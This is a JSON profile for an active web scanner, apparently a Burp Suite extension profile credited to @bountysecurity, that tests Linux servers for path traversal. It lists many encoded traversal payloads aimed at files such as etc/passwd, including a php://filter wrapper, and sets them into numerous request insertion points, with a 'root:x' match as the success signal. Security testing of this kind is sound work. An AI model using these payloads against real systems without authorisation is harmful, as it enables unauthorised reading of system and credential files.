[
  {
    "profile_name": "Path_Traversal_linux",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,/../../../../../../../../../../../../../../../../{FILE}",
          "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
          "true,../../../../../../../../../../../../../../../../../../../../../../{FILE}%00",
          "true,/{FILE}%00",
          "true,.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./{FILE}",
          "true,/../../../../../../../../../../../{FILE}%00.html",
          "true,/../../../../../../../../../../../{FILE}%00.jpg",
          "true,../../../../../../{FILE}\u0026\u003d%3C%3C%3C%3C",
          "true,....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/{FILE}",
          "true,....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//{FILE}",
          "true,Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA\u003d\u003d",
          "true,Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA\u003d\u003d",
          "true,/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../{FILE}",
          "true,/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
          "true,/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
          "true,..%2F..%2F..%2F%2F..%2F..%2F{FILE}",
          "true,%00../../../../../../{FILE}",
          "true,%00/{FILE}%00",
          "true,..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/{FILE}",
          "true,..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/{FILE}%00",
          "true,php://filter/zlib.deflate/convert.base64-encode/resource\u003d/{FILE}",
          "true,/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Simple String,,root:x"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "Path_Traversal_linux",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "Path_Traversal",
      "All",
      "Fase 2"
    ]
  }
]